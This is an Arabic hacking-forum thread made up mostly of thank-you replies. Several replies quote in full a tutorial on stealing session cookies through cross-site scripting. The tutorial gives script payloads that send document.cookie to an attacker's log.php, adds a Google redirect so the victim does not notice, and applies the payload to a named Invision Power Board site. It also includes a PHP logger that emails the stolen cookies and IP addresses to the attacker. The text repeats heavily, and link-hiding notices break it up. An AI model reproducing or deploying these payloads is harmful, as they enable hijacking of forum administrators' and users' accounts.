شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراًشكراًشكراً شكراًشكراًشكراً
Coder-Ma
06-25-2013, 04:31 AM
شكرا لك جزيلا
xpmhmd
06-25-2013, 11:55 AM
مشكووووووووور اخي
بتستحق جزيل الشكر
هاكز محترف
07-01-2013, 03:27 AM
بارك الله فيك عزيزي على الشرح
- - - تم التحديث - - -
:mad::)
مكور
عثمان هكر مغربي
07-07-2013, 10:12 AM
ألله يعطيك العافية
khalidwar
07-07-2013, 07:01 PM
j,kkknjnjhj jhj
- - - تم التحديث - - -
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
mafiaboy
07-11-2013, 04:43 PM
شكرا لك يا اخي شرح وافي
B.Gestapo
07-13-2013, 07:56 AM
مشكو على المجهود
- - - تم التحديث - - -
مشكوووووووووووووووور
- - - تم التحديث - - -
مشكوووووووووووووووور
الهاكر الاماراتي
07-14-2013, 08:23 AM
مشكور و جزاك الله خير
- - - تم التحديث - - -
مشكورررررررررر
داعم فنى
07-17-2013, 07:12 AM
شكرا لك اخوى وجارى المتابعه
- - - تم التحديث - - -
تسلم يا غالى :):)
علي البعاج
07-22-2013, 01:49 AM
مشكوووووووووووووووووور
aymanho
07-24-2013, 12:40 PM
بارك الله فيك على الموضوع المميز
farissi mohssin
07-24-2013, 03:38 PM
بارك الله فيك
ElSyad
07-30-2013, 03:50 PM
تسلم ايديك شرح بسيط ومفيد !
shadow_tdk
07-30-2013, 06:38 PM
مشكووووووور على الشرح الرائع
!! FiGo !!
08-01-2013, 10:03 AM
بارك الله فيك اخي
- - - تم التحديث - - -
بارك الله فيك اخي على الشرح الرائع
KADEME
08-01-2013, 04:39 PM
شكرا لك يا أخي
sat-doura
08-02-2013, 04:17 AM
gooooood man
- - - تم التحديث - - -
thank you man
abdouni33
08-03-2013, 12:10 AM
mashkoooooor
ayman msh
08-04-2013, 01:27 AM
مشكوووووووووووووووور
- - - تم التحديث - - -
مشكووووووووووووووور
samirqo
08-04-2013, 06:44 AM
مشكوووووووووووووووور
- - - تم التحديث - - -
مشكوووووووووووووووور
ح
الهكرز1
08-04-2013, 09:54 AM
كبير
واصل بدون فواصل يا ملك
ox.hack
08-10-2013, 09:51 PM
مشكووووووووووور
- - - تم التحديث - - -
جــزاك الله خيرا:)
استمر keep going
- - - تم التحديث - - -
مبدع شرح وافي
ayman msh
08-16-2013, 11:47 PM
جزاك الله كل خير اخي
- - - تم التحديث - - -
بارك الله فيك اخي ان شاء الله كله في ميزان حسناتك;)
قناص~الغلا
08-17-2013, 01:48 AM
:biggrin:;;;;;;;;;;;;;;;
GhoOost
08-23-2013, 05:07 PM
مشششششششششششششششششششششششش شششششششششكور
انس الشحروري
08-24-2013, 08:09 PM
الله يعطيك العافيه :)
- - - تم التحديث - - -
الله يعطيك العافيه :) :)
محمد الفسكاوى
08-25-2013, 09:11 AM
بارك الله فيك اخى انت بجد رائع
ahlywad
08-26-2013, 08:40 PM
tHanKs foR You ~>
- - - تم التحديث - - -
شكرا لك اخى على الشرح الخفيف والمميز والمفيد
Fosfory Hacker
08-27-2013, 08:08 PM
ييييييييشيشيش
mohssine54
08-30-2013, 02:48 PM
merciiiiiiiiiiiiiiiiiiiiiiiiii habibi
- - - تم التحديث - - -
مشكور ويعطيك ألف عافيه
- - - تم التحديث - - -
مشكور ويعطيك ألف عافيه
kuro-sawa
09-01-2013, 01:33 AM
thaaaaaaanks
- - - تم التحديث - - -
تسلم يا غالي :biggrin:
hani xavi
09-10-2013, 06:18 AM
بارك الله فيك
Athina
09-10-2013, 03:29 PM
بارك الله فيك اخي
انشاء الله محترف باك تراك
09-11-2013, 05:07 PM
مشكوووور واصل ابداعك
Timoosz
09-11-2013, 11:21 PM
مششكور لاهنت
spamer
09-13-2013, 09:22 PM
merciiiiiiiiii
- - - تم التحديث - - -
merciiiiiiiii
ox.hack
09-15-2013, 09:14 PM
شكرا على المجهود
واصـل
- - - تم التحديث - - -
جزاك الله خيرا
hammaridha
09-15-2013, 10:36 PM
بارك الله فيك أخي
- - - تم التحديث - - -
بارك الله فيك أخي الكريم
ahmed.asso
09-16-2013, 01:33 AM
الله يخلييك يا غاالي
nabil-b13
09-16-2013, 07:18 AM
شرح جميل مشكور
- - - تم التحديث - - -
شرح جميل و بسيط مشكور
mehdilarbi57
09-16-2013, 11:20 PM
merciiiiiiiiiiiiiiiiiii
aMoOoRe sh
09-21-2013, 03:02 PM
بارك الله فيك
MEGAlodon KSA
09-23-2013, 07:09 PM
بارك الله فيك
- - - تم التحديث - - -
:eek:مجهود رائع والل:eek:
مهدي-هكر
09-23-2013, 09:17 PM
شكراااااااا يا كبييير
- - - تم التحديث - - -
الله يبارك فيك و يجازيك ألف خير
- - - تم التحديث - - -
لا يظهر لي أي شيئ رديت و ما بيظهر شي
lbrens
09-26-2013, 07:38 PM
شكرااااااااا
AYOUBPOP5
10-03-2013, 01:27 AM
gooooooooooooooooooood
- - - تم التحديث - - -
gooooooooooood job brother
- - - تم التحديث - - -
gooooooooooooooooooooooooood bro
- - - تم التحديث - - -
nice we wait youuuuur best bro
- - - تم التحديث - - -
n nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
zizo-alg2011
10-11-2013, 12:20 PM
شكرا لك اخي الكريم
saifi161
10-11-2013, 10:26 PM
بارك الله فيك اخي
silver_ghost_1
10-12-2013, 02:25 AM
مشكور والله يعطيك العافيه
نتظر جديدك
الكوندور
10-13-2013, 02:08 PM
مشكوووووووووووووووووووور
azlar150
10-14-2013, 12:19 AM
Thankksss broooo :)
- - - تم التحديث - - -
thanks bro
sinoba30
10-14-2013, 05:41 PM
Mercer Bcp
- - - تم التحديث - - -
http://photosbuysell.com/video-buy.php?id=-8
xarmax
10-16-2013, 04:50 AM
مشكوووووووووووووووور
mahdiphp
10-16-2013, 08:34 PM
Thank You Very Mush
- - - تم التحديث - - -
Thank You Man :biggrin:
Timoosz
10-18-2013, 12:39 AM
مششكور لاهنت
انشاء الله محترف باك تراك
10-18-2013, 02:55 AM
يعطيك الف عافيه انشاء الله تكون في ميزان حسانتك وصل ابداعك بارك الله فيك
Jordan Ghost
10-18-2013, 01:11 PM
جميل بارك الله فيك
Tiger Killer
10-18-2013, 11:43 PM
مبدع يآ آسد بآرك آلله فيك !~
zouhaire
10-19-2013, 04:16 AM
مشكووووووووووور على هذا المجهود الرائع !!!!!
spamer
10-19-2013, 05:07 AM
merciii bzaaaaf
- - - تم التحديث - - -
mercii l3achra :)
RekoJ
10-21-2013, 05:32 PM
مشكوووووووووور
- - - تم التحديث - - -
مشكوووووووووووووووووووووو ووور
hithemlion
10-22-2013, 04:34 PM
شكررراااا يارب تكون مفيده
hackerman31
10-22-2013, 05:00 PM
مشكوووووووووووووووور
razakghardaia
10-26-2013, 08:55 PM
thank uu bro :)
- - - تم التحديث - - -
شكرا لك اخي لكني لا استطيع رؤية المحتوى بعد الرد :mad:
- - - تم التحديث - - -
ييييييييييييييييييييييييي يييييييييييييييييييي
- - - تم التحديث - - -
ييييييييييييييييييييييييي يييييي
wArD sYr 001
10-27-2013, 07:05 PM
مشكوووووووووووووووووووور
- - - تم التحديث - - -
شكرا على الشرح
khemgani
10-28-2013, 09:07 PM
مجهود كبير يستحق التقدير
بارك الله فيك أخي الكريم
moujahed boy
10-29-2013, 06:03 AM
:cool: thnxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
hackerman31
10-31-2013, 03:51 AM
مشكوووووووووووووووور
Mekano
11-03-2013, 11:45 PM
شرح جميل و بسيط مشكور
كاسر المشاعر
11-06-2013, 04:13 PM
الله يعطيك العافية.................................
dvhma
11-26-2013, 10:55 PM
thanxxxxxxxxxxxx
مجحف الضواري
11-30-2013, 01:23 PM
lu مع جزيل الشكر والتقدير
- - - تم التحديث - - -
شكر لك :tongue::biggrin::eek::mad::mad::mad::mad::mad::ma d::mad::mad::mad::mad::mad::mad:
xsimox
11-30-2013, 02:05 PM
مشكور ويعطيك ألف عافيه
:)
princo hacker
12-05-2013, 06:25 PM
مشكوور يعطيك العافيةة
- - - تم التحديث - - -
مشكور يعطيك الف عافية
tbolbie
12-06-2013, 09:20 PM
جمييييييييييييييييييييييي يييييييييييييييل
amine sharko
12-06-2013, 11:26 PM
مـــــــــــــــــــشــــ ــــــــكوووووووووووووووو ر
- - - تم التحديث - - -
;):mad::biggrin::eek::):wink::confused:مــــ� �ــــــــــــــشـــــــــ� �ــكوووووووووووووووور:cool::(: redface::tongue:;):(:):wink::cool:<3 <3 <3 <3 <3 <3 <3 <3 <3
commanderegy
12-06-2013, 11:27 PM
السلام عليكم ورحمه الله وبركاته ,,
الان هذا اول درس لي بهذا القسمبعد الغياب وهو يتكلم عن كيفيه عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط ثغرات
xss
طيب نأتي الان الى الكود المهم في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطxss
كود PHP:
**********javascript:alert(document.******)</Script>
الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash
ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!
طيب الحين وجدت هذا الكود سوف نربطه باللوج
ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )
طيب الان بعد ما ربطته اصبح الرابط :
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>
تمام الان :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط برابط اللوج الي عندك
المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :
كود PHP:
**********javascript:alert(document.******)</Script>
بـ
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>
الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط
بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط
طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني
بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه
مثلا نربطه بموقع عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل http://www.3asfh.net/vb/images/smilies/0056.gif (http://www.alqobor.com/vb/showthread.php?t=31313) وبكذا مايشك
بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس http://www.3asfh.net/vb/images/smilies/0056.gif (http://www.alqobor.com/vb/showthread.php?t=31313)
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>
طبعا انت استبدل عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)
طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال
بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board
الكود للثغره :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط '>**********alert(document.******)</script>
احنا راح نستبدل :
كود PHP:
**********javascript:alert(document.******)</Script>
بـ
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>
واستبدل هنا موقع جوجل باي موقع تبغاه
ورابط اللوج عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باللوج تبعك
====================
تطبيق :
التطبيق هنا :
كود PHP:
http://www.mahrum.com/forums/index.php?act=idx='>**********alert(document.******) </script>
===================
اللوج :
كود PHP:
<?php
// Thnx For Security 4 Arab - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
//----- S4a Logger v0.10 -----//
// Star
//Your Email --::--
$ToGet = "
[email protected]";
////////////////////////////////
$Ip = $REMOTE_ADDR;
$Sys = $HTTP_USER_AGENT;
//////////////////////////////////////////////
if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
//
$Time = date("l dS of F Y h:i:s A");
$Hdr = 'From: Logger <logger@secourty>';
$Msg = '
Hi ,, Mr.Attacker :D
-------------------------------------------
- Thnx For S4a ,, Security For Arab Forum -
- s4a -
- s4a froum -
---------------------------------------------------------------------
- This Script Coded By Devil-00 [ Devil From Palestine ] -
- <
[email protected]><
[email protected]><devil0f0p@ya hoo.com> -
---------------------------------------------------------------------
- IP ::- [ ' .$Ip.' ]
- System ::- [ '.$Sys.' ]
- The ****** ::- [ '.$id.' ]
- Time ::- [ '.$Time.' ]
---------------------------------------------------------------------
- root@devil00 ~ ./evilcat /etc/passwd -
- root@devil00 ~ ./s4acracker passwd --log <log.log> && -
---------------------------------------------------------------------
';
$send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
//
/* &@#&@#&@#&@#&@#&@#&@# code ,, By Devil-00 [ 25/5/2005 ] << v0.10 */
if(isset($_GET["re"])){
$&@#&@#&@#&@#&@#&@#&@# = $_GET["re"];
if($&@#&@#&@#&@#&@#&@#&@# == ""){
mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr);
}else{
header("location:".$&@#&@#&@#&@#&@#&@#&@#);
}
}
//
?>
استبدل هنا :
كود PHP:
$ToGet = "
[email protected]";
الايميل: عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
بالايميل تبعك !
واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير اع التطبيق الا لانه درس عملي فقط لا أكثر ..
وبإمكانك استغلاله بثغره xss تبع cPanel
وغيرها من عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss
راااااااااااااااااااااااا اااااااااااااااااائع
amine sharko
12-06-2013, 11:29 PM
mrc mrc boooooooooooko
joker palistaine
12-07-2013, 06:18 PM
مشكوووووور يا غالي
- - - تم التحديث - - -
شكرا والله بطل استمر
NEXTGENHACKER
12-08-2013, 09:13 PM
مشكوووووووووووووووووووووو وووور
mapoli
12-11-2013, 11:16 AM
مشكوووووووووووووووور
Zgamer
12-15-2013, 04:37 PM
مشكوور الحقيقة أفدتنييي كثييرا
farissi mohssin
12-15-2013, 06:06 PM
بـــــارك اللـــــــــه فــــك أخـــــــــــــــي
momomoy
12-15-2013, 10:05 PM
شكراااااااااااااااااااااا ااااااااااااااااااااااااا اااااااااا
commanderegy
12-23-2013, 11:09 AM
السلام عليكم ورحمه الله وبركاته ,,
الان هذا اول درس لي بهذا القسمبعد الغياب وهو يتكلم عن كيفيه عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط ثغرات
xss
طيب نأتي الان الى الكود المهم في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطxss
كود PHP:
**********javascript:alert(document.******)</Script>
الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash
ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!
طيب الحين وجدت هذا الكود سوف نربطه باللوج
ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )
طيب الان بعد ما ربطته اصبح الرابط :
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>
تمام الان :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط برابط اللوج الي عندك
المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :
كود PHP:
**********javascript:alert(document.******)</Script>
بـ
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>
الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط
بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط
طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني
بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه
مثلا نربطه بموقع عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل http://www.3asfh.net/vb/images/smilies/0056.gif (http://www.alqobor.com/vb/showthread.php?t=31313) وبكذا مايشك
بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
re=www.google.com&
بس http://www.3asfh.net/vb/images/smilies/0056.gif (http://www.alqobor.com/vb/showthread.php?t=31313)
بحيث يكون بعد & يوجد id ... الخ
يعني يكون الكود :
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>
طبعا انت استبدل عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)
طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال
بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board
الكود للثغره :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط '>**********alert(document.******)</script>
احنا راح نستبدل :
كود PHP:
**********javascript:alert(document.******)</Script>
بـ
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>
واستبدل هنا موقع جوجل باي موقع تبغاه
ورابط اللوج عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باللوج تبعك
====================
تطبيق :
التطبيق هنا :
كود PHP:
http://www.mahrum.com/forums/index.php?act=idx='>**********alert(document.******) </script>
===================
اللوج :
كود PHP:
<?php
// Thnx For Security 4 Arab - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
//----- S4a Logger v0.10 -----//
// Star
//Your Email --::--
$ToGet = "
[email protected]";
////////////////////////////////
$Ip = $REMOTE_ADDR;
$Sys = $HTTP_USER_AGENT;
//////////////////////////////////////////////
if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
//
$Time = date("l dS of F Y h:i:s A");
$Hdr = 'From: Logger <logger@secourty>';
$Msg = '
Hi ,, Mr.Attacker :D
-------------------------------------------
- Thnx For S4a ,, Security For Arab Forum -
- s4a -
- s4a froum -
---------------------------------------------------------------------
- This Script Coded By Devil-00 [ Devil From Palestine ] -
- <
[email protected]><
[email protected]><devil0f0p@ya hoo.com> -
---------------------------------------------------------------------
- IP ::- [ ' .$Ip.' ]
- System ::- [ '.$Sys.' ]
- The ****** ::- [ '.$id.' ]
- Time ::- [ '.$Time.' ]
---------------------------------------------------------------------
- root@devil00 ~ ./evilcat /etc/passwd -
- root@devil00 ~ ./s4acracker passwd --log <log.log> && -
---------------------------------------------------------------------
';
$send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
//
/* &@#&@#&@#&@#&@#&@#&@# code ,, By Devil-00 [ 25/5/2005 ] << v0.10 */
if(isset($_GET["re"])){
$&@#&@#&@#&@#&@#&@#&@# = $_GET["re"];
if($&@#&@#&@#&@#&@#&@#&@# == ""){
mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr);
}else{
header("location:".$&@#&@#&@#&@#&@#&@#&@#);
}
}
//
?>
استبدل هنا :
كود PHP:
$ToGet = "
[email protected]";
الايميل: عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
بالايميل تبعك !
واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير اع التطبيق الا لانه درس عملي فقط لا أكثر ..
وبإمكانك استغلاله بثغره xss تبع cPanel
وغيرها من عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss
راااااااااااااااااااااااا ااااااااااااااااااااااااا ااااااااااااااااااااائع
coner
12-24-2013, 12:55 AM
الله يعطيك العافية
جزاك الله خيراً
Hamada Bader
12-24-2013, 03:16 AM
لاهنت ويعطيك الف عافيه
modmen_10
01-06-2014, 01:52 AM
lمشكووووور
- - - تم التحديث - - -
مشكوووووووووووووور:)
MT3BHM
01-06-2014, 04:38 AM
مشكوووووووووووووووووووووو ووووووووووووور
السوري!
01-07-2014, 11:22 AM
شكرا لك وبارك الله فيك تستحق تقييم
- - - تم التحديث - - -
السلام عليكم ورحمه الله وبركاته ,,
الان هذا اول درس لي بهذا القسمبعد الغياب وهو يتكلم عن كيفيه عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط ثغرات
xss
طيب نأتي الان الى الكود المهم في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss
هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطxss
كود PHP:
**********javascript:alert(document.******)</Script>
الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
1- رقم العضويه
2- الباسورد مشفر md5
3 - الباسورد مشفر Hash
ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!
طيب الحين وجدت هذا الكود سوف نربطه باللوج
ماهو اللوج ؟
اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )
طيب الان بعد ما ربطته اصبح الرابط :
كود PHP:
**********location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>
تمام الان :
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط = الموقع المربوط فيه اللوج
log.php = اسم ملف اللوج
طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط برابط اللوج الي عندك
المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :
كود PHP:
**********javascript:alert(document.******)</Script>
بـ
كود PHP:
